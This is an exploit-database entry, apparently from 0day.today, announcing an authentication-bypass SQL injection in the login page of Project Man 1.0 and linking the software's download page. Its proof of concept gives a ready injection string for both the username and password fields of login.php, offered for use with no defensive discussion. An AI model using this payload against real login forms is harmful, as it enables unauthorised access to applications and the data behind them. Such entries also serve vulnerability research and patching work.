id: 11107
date: 02/27/2010
title: Project Man <= 1.0 (Auth Bypass) SQL Injection Vulnerability
author: cr4wl3r
cves: 

============================================================
Project Man <= 1.0 (Auth Bypass) SQL Injection Vulnerability
============================================================

##############################################################
##Project Man <= 1.0 (Auth Bypass) SQL Injection Vulnerability
##############################################################
Download: http://sourceforge.net/projects/projectman1/files/
##############################################################
PoC:
 [Project Man_path]/login.php
 
Username: ' or '1=1
password: ' or '1=1
##############################################################



#  0day.today [2023-03-22]  #